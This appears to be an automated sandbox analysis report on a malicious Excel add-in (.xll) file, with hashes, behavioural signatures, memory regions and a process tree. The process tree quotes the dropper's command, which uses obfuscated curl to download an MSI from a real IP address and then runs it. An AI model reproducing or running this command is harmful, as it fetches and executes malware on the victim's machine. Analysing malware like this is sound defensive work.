Analysis

  • max time kernel
    137s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-10-2023 11:21

General

  • Target

    5f129fdff5dfb2e851c024c8b0015be86c085951d36d81cc86a73becef1c5c10_JC.xll

  • Size

    12KB

  • MD5

    486e6d24f42c4fce3bd5feb6d628b382

  • SHA1

    d8513e0bd8ecd94a3f7d6ae1a43761a2f8d07627

  • SHA256

    5f129fdff5dfb2e851c024c8b0015be86c085951d36d81cc86a73becef1c5c10

  • SHA512

    dd707663be1a50968866ff62b51f2f05d6b1196aab3ad9b5a729f4c08b130b48cadf208770a645ec80a8db01f4dbd74721d816ba607751fdfbda7fd727ffd230

  • SSDEEP

    192:IU5z9i9veq2pJk+/qcJklyJOEtyF08TjsvGQwrgAhp:9z9SvWJH/IwJOUyF08UeQwrgC

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Loads dropped DLL 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\5f129fdff5dfb2e851c024c8b0015be86c085951d36d81cc86a73becef1c5c10_JC.xll"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:5004
    • \??\c:\windows\system32\cmd.exe
      c:\windows\system32\cmd.exe /c c^url -o c:\users\public\1.msi http://94.131.106.78/BcDx2y/OkJKB&&timeout 10&&c:\users\public\1.msi
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4144
      • C:\Windows\system32\curl.exe
        curl -o c:\users\public\1.msi http://94.131.106.78/BcDx2y/OkJKB
        3⤵
          PID:2664

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\5f129fdff5dfb2e851c024c8b0015be86c085951d36d81cc86a73becef1c5c10_JC.xll

      Filesize

      12KB

      MD5

      486e6d24f42c4fce3bd5feb6d628b382

      SHA1

      d8513e0bd8ecd94a3f7d6ae1a43761a2f8d07627

      SHA256

      5f129fdff5dfb2e851c024c8b0015be86c085951d36d81cc86a73becef1c5c10

      SHA512

      dd707663be1a50968866ff62b51f2f05d6b1196aab3ad9b5a729f4c08b130b48cadf208770a645ec80a8db01f4dbd74721d816ba607751fdfbda7fd727ffd230

    • C:\Users\Admin\AppData\Local\Temp\5f129fdff5dfb2e851c024c8b0015be86c085951d36d81cc86a73becef1c5c10_JC.xll

      Filesize

      12KB

      MD5

      486e6d24f42c4fce3bd5feb6d628b382

      SHA1

      d8513e0bd8ecd94a3f7d6ae1a43761a2f8d07627

      SHA256

      5f129fdff5dfb2e851c024c8b0015be86c085951d36d81cc86a73becef1c5c10

      SHA512

      dd707663be1a50968866ff62b51f2f05d6b1196aab3ad9b5a729f4c08b130b48cadf208770a645ec80a8db01f4dbd74721d816ba607751fdfbda7fd727ffd230

    • memory/5004-17-0x00007FF8BEE50000-0x00007FF8BF045000-memory.dmp

      Filesize

      2.0MB

    • memory/5004-7-0x00007FF8BEE50000-0x00007FF8BF045000-memory.dmp

      Filesize

      2.0MB

    • memory/5004-18-0x00007FF8BEE50000-0x00007FF8BF045000-memory.dmp

      Filesize

      2.0MB

    • memory/5004-6-0x00007FF87EED0000-0x00007FF87EEE0000-memory.dmp

      Filesize

      64KB

    • memory/5004-8-0x00007FF8BEE50000-0x00007FF8BF045000-memory.dmp

      Filesize

      2.0MB

    • memory/5004-9-0x00007FF87EED0000-0x00007FF87EEE0000-memory.dmp

      Filesize

      64KB

    • memory/5004-10-0x00007FF8BEE50000-0x00007FF8BF045000-memory.dmp

      Filesize

      2.0MB

    • memory/5004-11-0x00007FF8BEE50000-0x00007FF8BF045000-memory.dmp

      Filesize

      2.0MB

    • memory/5004-4-0x00007FF87EED0000-0x00007FF87EEE0000-memory.dmp

      Filesize

      64KB

    • memory/5004-2-0x00007FF87EED0000-0x00007FF87EEE0000-memory.dmp

      Filesize

      64KB

    • memory/5004-12-0x00007FF87C840000-0x00007FF87C850000-memory.dmp

      Filesize

      64KB

    • memory/5004-14-0x00007FF87C840000-0x00007FF87C850000-memory.dmp

      Filesize

      64KB

    • memory/5004-3-0x00007FF8BEE50000-0x00007FF8BF045000-memory.dmp

      Filesize

      2.0MB

    • memory/5004-1-0x00007FF8BEE50000-0x00007FF8BF045000-memory.dmp

      Filesize

      2.0MB

    • memory/5004-50-0x00007FF8BEE50000-0x00007FF8BF045000-memory.dmp

      Filesize

      2.0MB

    • memory/5004-5-0x00007FF8BEE50000-0x00007FF8BF045000-memory.dmp

      Filesize

      2.0MB

    • memory/5004-19-0x00007FF8BEE50000-0x00007FF8BF045000-memory.dmp

      Filesize

      2.0MB

    • memory/5004-20-0x00007FF8BEE50000-0x00007FF8BF045000-memory.dmp

      Filesize

      2.0MB

    • memory/5004-21-0x00007FF8BEE50000-0x00007FF8BF045000-memory.dmp

      Filesize

      2.0MB

    • memory/5004-40-0x00007FF87EED0000-0x00007FF87EEE0000-memory.dmp

      Filesize

      64KB

    • memory/5004-41-0x00007FF87EED0000-0x00007FF87EEE0000-memory.dmp

      Filesize

      64KB

    • memory/5004-44-0x00007FF87EED0000-0x00007FF87EEE0000-memory.dmp

      Filesize

      64KB

    • memory/5004-43-0x00007FF8BEE50000-0x00007FF8BF045000-memory.dmp

      Filesize

      2.0MB

    • memory/5004-42-0x00007FF87EED0000-0x00007FF87EEE0000-memory.dmp

      Filesize

      64KB

    • memory/5004-45-0x00007FF8BEE50000-0x00007FF8BF045000-memory.dmp

      Filesize

      2.0MB

    • memory/5004-46-0x00007FF8BEE50000-0x00007FF8BF045000-memory.dmp

      Filesize

      2.0MB

    • memory/5004-47-0x00007FF8BEE50000-0x00007FF8BF045000-memory.dmp

      Filesize

      2.0MB

    • memory/5004-48-0x00007FF8BEE50000-0x00007FF8BF045000-memory.dmp

      Filesize

      2.0MB

    • memory/5004-49-0x00007FF8BEE50000-0x00007FF8BF045000-memory.dmp

      Filesize

      2.0MB

    • memory/5004-0-0x00007FF87EED0000-0x00007FF87EEE0000-memory.dmp

      Filesize

      64KB